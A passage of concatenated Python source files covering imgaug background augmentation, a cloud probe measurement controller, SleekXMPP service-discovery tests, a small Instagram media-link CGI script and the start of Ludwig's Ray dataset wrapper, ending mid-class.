def shift(self, top=None, right=None, bottom=None, left=None):
bbs_new = [bb.shift(top=top, right=right, bottom=bottom, left=left) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs_new, shape=self.shape)
def copy(self):
"""
Create a shallow copy of the BoundingBoxesOnImage object.
Returns
-------
out : BoundingBoxesOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the BoundingBoxesOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# Manual copy is far faster than deepcopy for KeypointsOnImage,
# so use manual copy here too
bbs = [bb.deepcopy() for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBoxesOnImage(%s, shape=%s)" % (str(self.bounding_boxes), self.shape)
############################
# Background augmentation
############################
class Batch(object):
"""
Class encapsulating a batch before and after augmentation.
Parameters
----------
images : None or (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The images to
augment.
keypoints : None or list of KeypointOnImage
The keypoints to
augment.
data : anything
Additional data that is saved in the batch and may be read out
after augmentation. This could e.g. contain filepaths to each image
in `images`. As this object is usually used for background
augmentation with multiple processes, the augmented Batch objects might
not be returned in the original order, making this information useful.
"""
def __init__(self, images=None, keypoints=None, data=None):
self.images = images
self.images_aug = None
self.keypoints = keypoints
self.keypoints_aug = None
self.data = data
class BatchLoader(object):
"""
Class to load batches in the background.
Loaded batches can be accesses using `BatchLoader.queue`.
Parameters
----------
load_batch_func : callable
Function that yields Batch objects (i.e. expected to be a generator).
Background loading automatically stops when the last batch was yielded.
queue_size : int, optional(default=50)
Maximum number of batches to store in the queue. May be set higher
for small images and/or small batches.
nb_workers : int, optional(default=1)
Number of workers to run in the background.
threaded : bool, optional(default=True)
Whether to run the background processes using threads (true) or
full processes (false).
"""
def __init__(self, load_batch_func, queue_size=50, nb_workers=1, threaded=True):
do_assert(queue_size > 0)
do_assert(nb_workers >= 1)
self.queue = multiprocessing.Queue(queue_size)
self.join_signal = multiprocessing.Event()
self.finished_signals = []
self.workers = []
self.threaded = threaded
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
finished_signal = multiprocessing.Event()
self.finished_signals.append(finished_signal)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def all_finished(self):
"""
Determine whether the workers have finished the loading process.
Returns
-------
out : bool
True if all workers have finished. Else False.
"""
return all([event.is_set() for event in self.finished_signals])
def _load_batches(self, load_batch_func, queue, finished_signal, join_signal, seedval):
if seedval is not None:
random.seed(seedval)
np.random.seed(seedval)
seed(seedval)
for batch in load_batch_func():
do_assert(isinstance(batch, Batch), "Expected batch returned by lambda function to be of class imgaug.Batch, got %s." % (type(batch),))
queue.put(pickle.dumps(batch, protocol=-1))
if join_signal.is_set():
break
finished_signal.set()
def terminate(self):
"""
Stop all workers.
"""
self.join_signal.set()
if self.threaded:
for worker in self.workers:
worker.join()
else:
for worker, finished_signal in zip(self.workers, self.finished_signals):
worker.terminate()
finished_signal.set()
self.queue.close()
class BackgroundAugmenter(object):
"""
Class to augment batches in the background (while training on the GPU).
This is a wrapper around the multiprocessing module.
Parameters
----------
batch_loader : BatchLoader
BatchLoader object to load data in the
background.
augseq : Augmenter
An augmenter to apply to all loaded images.
This may be e.g. a Sequential to apply multiple augmenters.
queue_size : int
Size of the queue that is used to temporarily save the augmentation
results. Larger values offer the background processes more room
to save results when the main process doesn't load much, i.e. they
can lead to smoother and faster training. For large images, high
values can block a lot of RAM though.
nb_workers : "auto" or int
Number of background workers to spawn. If auto, it will be set
to C-1, where C is the number of CPU cores.
"""
def __init__(self, batch_loader, augseq, queue_size=50, nb_workers="auto"):
do_assert(queue_size > 0)
self.augseq = augseq
self.source_finished_signals = batch_loader.finished_signals
self.queue_source = batch_loader.queue
self.queue_result = multiprocessing.Queue(queue_size)
if nb_workers == "auto":
try:
nb_workers = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
nb_workers = 1
# try to reserve at least one core for the main process
nb_workers = max(1, nb_workers - 1)
else:
do_assert(nb_workers >= 1)
#print("Starting %d background processes" % (nb_workers,))
self.nb_workers = nb_workers
self.workers = []
self.nb_workers_finished = 0
self.augment_images = True
self.augment_keypoints = True
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment_images_worker, args=(augseq, self.queue_source, self.queue_result, self.source_finished_signals, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
"""
Returns a batch from the queue of augmented batches.
If workers are still running and there are no batches in the queue,
it will automatically wait for the next batch.
Returns
-------
out : None or ia.Batch
One batch or None if all workers have finished.
"""
batch_str = self.queue_result.get()
batch = pickle.loads(batch_str)
if batch is not None:
return batch
else:
self.nb_workers_finished += 1
if self.nb_workers_finished == self.nb_workers:
return None
else:
return self.get_batch()
def _augment_images_worker(self, augseq, queue_source, queue_result, source_finished_signals, seedval):
"""
Worker function that endlessly queries the source queue (input
batches), augments batches in it and sends the result to the output
queue.
"""
np.random.seed(seedval)
random.seed(seedval)
augseq.reseed(seedval)
seed(seedval)
while True:
# wait for a new batch in the source queue and load it
try:
batch_str = queue_source.get(timeout=0.1)
batch = pickle.loads(batch_str)
# augment the batch
batch_augment_images = batch.images is not None and self.augment_images
batch_augment_keypoints = batch.keypoints is not None and self.augment_keypoints
if batch_augment_images and batch_augment_keypoints:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.keypoints_aug = augseq_det.augment_keypoints(batch.keypoints)
elif batch_augment_images:
batch.images_aug = augseq.augment_images(batch.images)
elif batch_augment_keypoints:
batch.keypoints_aug = augseq.augment_keypoints(batch.keypoints)
# send augmented batch to output queue
batch_str = pickle.dumps(batch, protocol=-1)
queue_result.put(batch_str)
except QueueEmpty:
if all([signal.is_set() for signal in source_finished_signals]):
queue_result.put(pickle.dumps(None, protocol=-1))
return
def terminate(self):
"""
Terminates all background processes immediately.
This will also free their RAM.
"""
for worker in self.workers:
worker.terminate()
self.queue_result.close()
|
probe_controller.py
|
"""
The old module responsible for measurement data collection. Currently is not used, was substituted by IVIS.
May be plugged back in in the future.
"""
import time
from functools import reduce
from multiprocessing.pool import ThreadPool, ApplyResult
from typing import List, Tuple, Dict, Optional
import threading
import logging
from cloud_controller.knowledge.knowledge import Knowledge
from cloud_controller.knowledge.model import TimeContract
from cloud_controller.knowledge.instance import ManagedCompin
from cloud_controller.middleware import AGENT_PORT, middleware_pb2
from cloud_controller.middleware.helpers import connect_to_grpc_server
from cloud_controller.middleware.middleware_pb2_grpc import MiddlewareAgentStub
class RuntimeMeasurementScenario:
def __init__(self):
self.workloads: List[Tuple[ManagedCompin, str, int]] = []
class ScenarioFactory:
def add_compin(self, compin: ManagedCompin) -> None:
pass
def remove_compin(self, compin: ManagedCompin) -> None:
pass
def next_scenario(self) -> RuntimeMeasurementScenario:
pass
class SingleNodeScenarioFactory(ScenarioFactory):
# TODO: as of now it assumes one probe per component. Fix this!
def __init__(self):
self.current_node: str = ""
self.compins_by_node: Dict[str, List[ManagedCompin]] = {}
self.nodes: List[str] = []
self.current_node_index: int = 0
self.DEFAULT_ITERATION_COUNT = 10
def add_compin(self, compin: ManagedCompin) -> None:
assert len(compin.component.probes) == 1
if compin.node_name not in self.compins_by_node:
self.compins_by_node[compin.node_name] = []
self.nodes.append(compin.node_name)
self.compins_by_node[compin.node_name].append(compin)
def remove_compin(self, compin: ManagedCompin) -> None:
assert compin.node_name in self.compins_by_node
assert compin in self.compins_by_node[compin.node_name]
self.compins_by_node[compin.node_name].remove(compin)
if len(self.compins_by_node[compin.node_name]) == 0:
del self.compins_by_node[compin.node_name]
self.nodes.remove(compin.node_name)
def next_scenario(self) -> Optional[RuntimeMeasurementScenario]:
if len(self.nodes) == 0:
return None
if self.current_node_index >= len(self.nodes):
self.current_node_index = 0
scenario = RuntimeMeasurementScenario()
for compin in self.compins_by_node[self.nodes[self.current_node_index]]:
probe_name = compin.component.probes[0].name
scenario.workloads.append((compin, probe_name, self.DEFAULT_ITERATION_COUNT))
self.current_node_index += 1
return scenario
class StatisticsCollector:
# TODO: as of now it assumes one probe per component. Fix this!
# TODO: improve performance of statistics calculation
def __init__(self):
self.compin_data: Dict[str, List[float]] = {}
self.component_data: Dict[Tuple[str, str], List[float]] = {}
self.time_limits: Dict[Tuple[str, str], float] = {}
self.compin_time_limits: Dict[str, float] = {}
def process_data(self, compin: ManagedCompin, data: List[str]):
component_id = (compin.component.application.name, compin.component.name)
if compin.id not in self.compin_data:
self.compin_data[compin.id] = []
assert len(compin.component.probes) == 1
assert len(compin.component.probes[0].requirements) == 1
requirement = compin.component.probes[0].requirements[0]
assert isinstance(requirement, TimeContract)
self.compin_time_limits[compin.id] = requirement.time
if component_id not in self.component_data:
self.component_data[component_id] = []
assert len(compin.component.probes) == 1
assert len(compin.component.probes[0].requirements) == 1
requirement = compin.component.probes[0].requirements[0]
assert isinstance(requirement, TimeContract)
self.time_limits[component_id] = requirement.time
for line in data:
items = line.split(';')
assert len(items) >= 5
execution_time = float(items[4])
self.compin_data[compin.id].append(execution_time)
self.component_data[component_id].append(execution_time)
def get_compin_stats(self) -> List[Tuple[str, float]]:
stats = []
for compin_id, data in self.compin_data.items():
time_limit = self.compin_time_limits[compin_id]
success_count = reduce((lambda x, y: x + 1 if y < time_limit else x), [0] + data)
success_percentage = success_count / len(data)
stats.append((compin_id, success_percentage))
return stats
def get_component_stats(self) -> List[Tuple[Tuple[str, str], float]]:
stats = []
for component_id, data in self.component_data.items():
time_limit = self.time_limits[component_id]
success_count = reduce((lambda x, y: x + 1 if y < time_limit else x), [0] + data)
success_percentage = success_count / len(data)
stats.append((component_id, success_percentage))
return stats
def get_global_stats(self) -> float:
total_count = reduce((lambda x, y: x + len(y)), [0] + list(self.compin_data.values()))
compin_stats = self.get_compin_stats()
total_successes = reduce((lambda x, y: x + y[1] * len(self.compin_data[y[0]])), [0] + compin_stats)
return total_successes / total_count
class ProbeController:
def __init__(self, knowledge: Knowledge):
self._knowledge = knowledge
self._pool: ThreadPool = None
self._factory: ScenarioFactory = SingleNodeScenarioFactory()
self._compin_threads: Dict[str, Tuple[ManagedCompin, ApplyResult]] = {}
self.statistics_collector = StatisticsCollector()
self.MEASUREMENT_HEADER = "run;iteration;start_time;end_time;elapsed"
self.lock = threading.RLock()
def measure_workload(self, compin: ManagedCompin, probe: str, cycles: int) -> List[str]:
stub: MiddlewareAgentStub = connect_to_grpc_server(MiddlewareAgentStub, compin.ip, AGENT_PORT,
block=True, production=True)
measure_msg = middleware_pb2.ProbeMeasurement(
probe=middleware_pb2.ProbeDescriptor(name=probe),
warmUpCycles=0,
measuredCycles=cycles
)
result = stub.MeasureProbe(measure_msg)
if result.result != middleware_pb2.ProbeCallResult.Result.Value("OK"):
# TODO: propagate this exception to the highest level
raise Exception("Error in measurements")
data: List[str] = []
for row in stub.CollectProbeResults(measure_msg.probe):
if row.WhichOneof("resultType") == "header":
assert row.header.strip() == self.MEASUREMENT_HEADER
elif row.WhichOneof("resultType") == "row":
data.append(row.row)
return data
def start(self):
measurement_thread = threading.Thread(target=self._run, args=())
measurement_thread.setDaemon(True)
measurement_thread.start()
def _run(self) -> None:
"""
Measurement thread.
"""
while True:
with self.lock:
scenario: RuntimeMeasurementScenario = self._factory.next_scenario()
if scenario is None:
time.sleep(1)
continue
self._pool = ThreadPool(processes=len(scenario.workloads))
for compin, probe, cycles in scenario.workloads:
result = self._pool.apply_async(self.measure_workload, (compin, probe, cycles))
self._compin_threads[compin.ip] = (compin, result)
for compin, result in self._compin_threads.values():
result.wait()
data = result.get()
self.statistics_collector.process_data(compin, data)
self._log_stats()
def add_compin(self, compin: ManagedCompin) -> None:
"""
Notifies the controller about new compin available for measurement. If this compin fits the criteria for the
current measurement scenario, starts measuring its probes right away.
:param compin: ManagedCompin to add
"""
with self.lock:
self._factory.add_compin(compin)
def remove_compin(self, compin: ManagedCompin) -> None:
"""
Notifies the controller that the given compin is going to be deleted. If this compin is currently being
measured, stops the measurement.
:param compin: ManagedCompin to remove
"""
with self.lock:
self._factory.remove_compin(compin)
def _log_stats(self) -> None:
logging.info(f"------------ TOTAL PERCENTAGE: {self.statistics_collector.get_global_stats()} ---------------")
for (app, component), percentage in self.statistics_collector.get_component_stats():
logging.info(f"Component {app}${component}: {percentage}")
logging.info("--------------------------------------------------------------------------------------------")
for compin, percentage in self.statistics_collector.get_compin_stats():
logging.info(f"Compin {compin}: {percentage}")
|
test_stream_xep_0030.py
|
import sys
import time
import threading
from sleekxmpp.test import *
class TestStreamDisco(SleekTest):
"""
Test using the XEP-0030 plugin.
"""
def tearDown(self):
self.stream_close()
def testInfoEmptyDefaultNode(self):
"""
Info query result from an entity MUST have at least one identity
and feature, namely http://jabber.org/protocol/disco#info.
Since the XEP-0030 plugin is loaded, a disco response should
be generated and not an error result.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
self.recv("""
<iq type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#info" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info">
<identity category="client" type="bot" />
<feature var="http://jabber.org/protocol/disco#info" />
</query>
</iq>
""")
def testInfoEmptyDefaultNodeComponent(self):
"""
Test requesting an empty, default node using a Component.
"""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
self.recv("""
<iq type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#info" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info">
<identity category="component" type="generic" />
<feature var="http://jabber.org/protocol/disco#info" />
</query>
</iq>
""")
def testInfoIncludeNode(self):
"""
Results for info queries directed to a particular node MUST
include the node in the query response.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
self.xmpp['xep_0030'].static.add_node(node='testing')
self.recv("""
<iq to="tester@localhost" type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
</query>
</iq>""",
method='mask')
def testItemsIncludeNode(self):
"""
Results for items queries directed to a particular node MUST
include the node in the query response.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
self.xmpp['xep_0030'].static.add_node(node='testing')
self.recv("""
<iq to="tester@localhost" type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
</query>
</iq>""",
method='mask')
def testDynamicInfoJID(self):
"""
Test using a dynamic info handler for a particular JID.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('client', 'console', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
jid='tester@localhost',
handler=dynamic_jid)
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<identity category="client"
type="console"
name="Dynamic Info" />
</query>
</iq>
""")
def testDynamicInfoGlobal(self):
"""
Test using a dynamic info handler for all requests.
"""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('component', 'generic', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
handler=dynamic_global)
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<identity category="component"
type="generic"
name="Dynamic Info" />
</query>
</iq>
""")
def testOverrideJIDInfoHandler(self):
"""Test overriding a JID info handler."""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('client', 'console', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
jid='tester@localhost',
handler=dynamic_jid)
self.xmpp['xep_0030'].make_static(jid='tester@localhost',
node='testing')
self.xmpp['xep_0030'].add_identity(jid='tester@localhost',
node='testing',
category='automation',
itype='command-list')
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<identity category="automation"
type="command-list" />
</query>
</iq>
""")
def testOverrideGlobalInfoHandler(self):
"""Test overriding the global JID info handler."""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('component', 'generic', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
handler=dynamic_global)
self.xmpp['xep_0030'].make_static(jid='user@tester.localhost',
node='testing')
self.xmpp['xep_0030'].add_feature(jid='user@tester.localhost',
node='testing',
feature='urn:xmpp:ping')
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<feature var="urn:xmpp:ping" />
</query>
</iq>
""")
def testGetInfoRemote(self):
"""
Test sending a disco#info query to another entity
and receiving the result.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
events = set()
def handle_disco_info(iq):
events.add('disco_info')
self.xmpp.add_event_handler('disco_info', handle_disco_info)
t = threading.Thread(name="get_info",
target=self.xmpp['xep_0030'].get_info,
args=('user@localhost', 'foo'))
t.start()
self.send("""
<iq type="get" to="user@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#info"
node="foo" />
</iq>
""")
self.recv("""
<iq type="result" to="tester@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#info"
node="foo">
<identity category="client" type="bot" />
<feature var="urn:xmpp:ping" />
</query>
</iq>
""")
# Wait for disco#info request to be received.
t.join()
time.sleep(0.1)
self.assertEqual(events, set(('disco_info',)),
"Disco info event was not triggered: %s" % events)
def testDynamicItemsJID(self):
"""
Test using a dynamic items handler for a particular JID.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester@localhost', node='foo', name='JID')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
jid='tester@localhost',
handler=dynamic_jid)
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="tester@localhost" node="foo" name="JID" />
</query>
</iq>
""")
def testDynamicItemsGlobal(self):
"""
Test using a dynamic items handler for all requests.
"""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester@localhost', node='foo', name='Global')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
handler=dynamic_global)
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="tester@localhost" node="foo" name="Global" />
</query>
</iq>
""")
def testOverrideJIDItemsHandler(self):
"""Test overriding a JID items handler."""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester@localhost', node='foo', name='Global')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
jid='tester@localhost',
handler=dynamic_jid)
self.xmpp['xep_0030'].make_static(jid='tester@localhost',
node='testing')
self.xmpp['xep_0030'].add_item(ijid='tester@localhost',
node='testing',
jid='tester@localhost',
subnode='foo',
name='Test')
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="tester@localhost" node="foo" name="Test" />
</query>
</iq>
""")
def testOverrideGlobalItemsHandler(self):
"""Test overriding the global JID items handler."""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester.localhost', node='foo', name='Global')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
handler=dynamic_global)
self.xmpp['xep_0030'].make_static(jid='user@tester.localhost',
node='testing')
self.xmpp['xep_0030'].add_item(ijid='user@tester.localhost',
node='testing',
jid='user@tester.localhost',
subnode='foo',
name='Test')
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="user@tester.localhost" node="foo" name="Test" />
</query>
</iq>
""")
def testGetItemsRemote(self):
"""
Test sending a disco#items query to another entity
and receiving the result.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
events = set()
results = set()
def handle_disco_items(iq):
events.add('disco_items')
results.update(iq['disco_items']['items'])
self.xmpp.add_event_handler('disco_items', handle_disco_items)
t = threading.Thread(name="get_items",
target=self.xmpp['xep_0030'].get_items,
args=('user@localhost', 'foo'))
t.start()
self.send("""
<iq type="get" to="user@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#items"
node="foo" />
</iq>
""")
self.recv("""
<iq type="result" to="tester@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#items"
node="foo">
<item jid="user@localhost" node="bar" name="Test" />
<item jid="user@localhost" node="baz" name="Test 2" />
</query>
</iq>
""")
# Wait for disco#items request to be received.
t.join()
time.sleep(0.1)
items = set([('user@localhost', 'bar', 'Test'),
('user@localhost', 'baz', 'Test 2')])
self.assertEqual(events, set(('disco_items',)),
"Disco items event was not triggered: %s" % events)
self.assertEqual(results, items,
"Unexpected items: %s" % results)
def testGetItemsIterator(self):
"""Test interaction between XEP-0030 and XEP-0059 plugins."""
raised_exceptions = []
self.stream_start(mode='client',
plugins=['xep_0030', 'xep_0059'])
results = self.xmpp['xep_0030'].get_items(jid='foo@localhost',
node='bar',
iterator=True)
results.amount = 10
def run_test():
try:
results.next()
except StopIteration:
raised_exceptions.append(True)
t = threading.Thread(name="get_items_iterator",
target=run_test)
t.start()
self.send("""
<iq id="2" type="get" to="foo@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="bar">
<set xmlns="http://jabber.org/protocol/rsm">
<max>10</max>
</set>
</query>
</iq>
""")
self.recv("""
<iq id="2" type="result" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items">
<set xmlns="http://jabber.org/protocol/rsm">
</set>
</query>
</iq>
""")
t.join()
self.assertEqual(raised_exceptions, [True],
"StopIteration was not raised: %s" % raised_exceptions)
suite = unittest.TestLoader().loadTestsFromTestCase(TestStreamDisco)
|
insta.py
|
#!D:/Python3/python.exe
import cgi
import re
import urllib,urllib.request
import time
import os
import _thread
import threading
import datetime
#os.environ['NO_PROXY'] = 'instagram.com'
form = cgi.FieldStorage() # парсинг данных формы
l = threading.Lock() #создаём блокировку
'''def loadF(newurl, photoname):
try:
urllib.request.urlretrieve(newurl, 'C://Server/www/'+photoname+'.jpg')
except Exception as err:
print("Wrong link")
'''
def Uol():
try:
with l:
link = str(urllib.request.urlopen(cgi.escape(form['link'].value)).read())
ex = re.compile(r'(("display_url"|"video_url"):"https://(.*?).(jpg|mp4)")')
result = ex.finditer(link)
photos = []
for ma in result:
if str(ma.group(0)) not in photos:
photos.append(str(ma.group(0)))
if len(photos) == 0:
print("<div align=\"center\">")
print("<h1>Wrong link</h1>")
print("</div>")
delsize = 0
typecontent = ""
for newurl in list(photos):
if "video" in newurl:
delsize = 13
typecontent = "<div id=\"cont\" align=\"center\"><video controls=\"controls\"><source src=\"$URL$\"></video></div>"
else:
delsize = 15
typecontent = "<div id=\"cont\" align=\"center\"><img src=\"$URL$\" alt=\"альтернативный текст\"> </div>"
newurl = newurl[delsize:len(newurl)-1]
print(typecontent.replace("$URL$",newurl))
except Exception as er:
print(er)
now= str(datetime.datetime.now().strftime("%d-%m-%Y %H:%M"))
print("<footer>")
print("<p>Правой нопкой мышки кликните на фотографию или видео и выберите пункт \"Сохранить изображение(видео) как...\"</p>")
print("</footer>")
print("<div id=\"dt\" align=\"center\">"+now+"</div>")
print("</div>")
print("</body>")
print("</html>")
def htmlS():
print('Content-type: text/html\n')
with open("InstagramLo.html") as file:
for i in range(0,25):
print(file.readline(), end="\n")
htmlS()
if not 'link' in form:
print("<div align=\"center\">")
print("<h1>Empty</h1>")
print("</div>")
else:
thread = threading.Thread(target=Uol, args=())
thread.start()
thread.join()
|
ray.py
|
#! /usr/bin/env python
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import contextlib
import math
import queue
import threading
from distutils.version import LooseVersion
from functools import lru_cache
from typing import Any, Dict, Iterator
import numpy as np
import pandas as pd
import ray
from ray.data import from_dask, read_parquet
from ray.data.dataset_pipeline import DatasetPipeline
from ray.data.extensions import TensorDtype
from ludwig.constants import BINARY, CATEGORY, NAME, NUMERICAL, TYPE
from ludwig.data.batcher.base import Batcher
from ludwig.data.dataset.base import Dataset, DatasetManager
from ludwig.utils.data_utils import DATA_TRAIN_HDF5_FP
from ludwig.utils.misc_utils import get_proc_features
from ludwig.utils.types import DataFrame
_ray18 = LooseVersion(ray.__version__) >= LooseVersion("1.8")
_SCALAR_TYPES = {BINARY, CATEGORY, NUMERICAL}
class RayDataset(Dataset):
"""Wrapper around ray.data.Dataset."""
def __init__(self, df: DataFrame, features: Dict[str, Dict], training_set_metadata: Dict[str, Any]):
self.ds = from_dask(df) if not isinstance(df, str) else read_parquet(df)
self.features = features
self.training_set_metadata = training_set_metadata
self.data_hdf5_fp = training_set_metadata.get(DATA_TRAIN_HDF5_FP)
# TODO ray 1.8: convert to Tensors before shuffle
# def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
# for c in features.keys():
# df[c] = df[c].astype(TensorDtype())
# return df
# self.ds = self.ds.map_batches(to_tensors, batch_format="pandas")
def pipeline(self, shuffle=True) -> DatasetPipeline:
pipe = self.ds.repeat()
if shuffle:
if _ray18:
pipe = pipe.random_shuffle_each_window()
else:
pipe = pipe.random_shuffle()
return pipe
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.ds.repeat().iter_datasets(),
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
def __len__(self):
return self.ds.count()
@property
def size(self):
return len(self)
class RayDatasetManager(DatasetManager):
def __init__(self, backend):
self.backend = backend
def create(self, dataset: DataFrame, config: Dict[str, Any], training_set_metadata: Dict[str, Any]):
return RayDataset(dataset, get_proc_features(config), training_set_metadata)
def save(
self,
cache_path: str,
dataset: DataFrame,
config: Dict[str, Any],
training_set_metadata: Dict[str, Any],
tag: str,
):
self.backend.df_engine.to_parquet(dataset, cache_path)
return cache_path
def can_cache(self, skip_save_processed_input):
return not skip_save_processed_input
@property
def data_format(self):
return "parquet"
class RayDatasetShard(Dataset):
def __init__(
self,
dataset_shard: DatasetPipeline,
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
):
self.dataset_shard = dataset_shard
self.features = features
self.training_set_metadata = training_set_metadata
self.dataset_iter = dataset_shard.iter_datasets()
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.dataset_iter,
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
@lru_cache(1)
def __len__(self):
# TODO(travis): find way to avoid calling this, as it's expensive
return next(self.dataset_iter).count()
@property
def size(self):
return len(self)
class RayDatasetBatcher(Batcher):
def __init__(
self,
dataset_epoch_iterator: Iterator[ray.data.Dataset],
